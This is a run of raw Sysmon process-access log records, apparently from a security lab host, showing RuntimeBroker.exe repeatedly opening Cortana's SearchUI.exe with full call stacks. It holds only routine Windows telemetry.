13:30:12.310{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12149|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012086Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.310{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+124d1|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012085Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.310{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12383|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012084Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.310{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12277|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012083Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.310{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12149|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012082Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.310{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+124d1|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012081Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.310{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12277|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012080Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.310{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12383|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012079Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.310{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12149|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012078Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.310{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+124d1|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012077Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.310{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12383|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012076Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.310{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12277|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012075Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.310{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12149|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012074Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.310{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+13d1e|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1382d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11706|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11059|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9 10341000x800000000000000012073Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.310{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+13711|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11706|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11059|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x800000000000000012072Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.310{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+13624|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11706|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11059|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x800000000000000012071Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.310{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11620|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11059|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012070Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.310{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+124d1|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012069Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.310{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12383|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012068Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 